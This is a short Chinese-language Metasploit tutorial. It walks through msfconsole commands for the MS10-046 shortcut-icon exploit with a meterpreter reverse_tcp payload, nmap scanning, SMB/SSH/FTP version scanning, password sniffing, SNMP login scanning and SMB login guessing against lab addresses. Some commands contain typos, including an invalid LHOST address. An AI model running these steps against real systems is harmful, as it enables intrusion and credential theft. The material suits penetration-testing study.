- Metesploit Framework 基础知识
调用 exploit漏洞用use
使用payload用set
参数也是用set - 启动:
- 命令行输入:msfconsole
- 命令行输入:msfcli +参数
- 图形化界面输入:armitage
- 实例讲解1 ms10_046快捷方式图标漏洞
msfconsole
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show options //查看需要配置哪些参数
set SRVHOST 192.168.1.102 //配置参数
show options//查看设置的值
set PAYLOAD windows/meterpreter/reverse_tcp //指定payload
show option //查看配置参数
set LHOST 912.168.1.102
show option //查看配置参数
exploit
- 调用nmap端口扫描
msfconsole
namp -v -sV 192.168.0.191
- 扫描获取系统信息
msfconsole
启动软件
use auxiliary/scanner/smb/smb_version
调用模块
show optioins
查看配置参数
set RHOST 192.168.0.191
设置参数
set THREADS 10
run
启动 - 服务识别
msfconsole
启动软件
use auxiliary/scanner/ssh/ssh_version
调用模块
show optioins
查看配置参数
set RHOST 192.168.0.191
设置参数
run
启动
msfconsole
启动软件
use auxiliary/scanner/ftp/ftp_version
调用模块
show optioins
查看配置参数
set RHOST 192.168.0.191
设置参数
run
启动 - 密码嗅探
use auxiliary/sniffer/psnuffle
调用模块 - 扫描与枚举
msfconsole
启动软件
use auxiliary/scanner/snmp/snmp_login
调用模块
show optioins
查看配置参数
set RHOST 192.168.0.191
设置参数
set THREADS 10
run
启动 - SMB登录验证
msfconsole
启动软件
use auxiliary/scanner/smb/smb_login
调用模块
show optioins
查看配置参数
set RHOST 192.168.0.191
设置参数
set SMBUSER administrator
设置用户名
set THREADS 10
run
启动
Metasploit Framework 总结
最新推荐文章于 2020-07-09 16:46:37 发布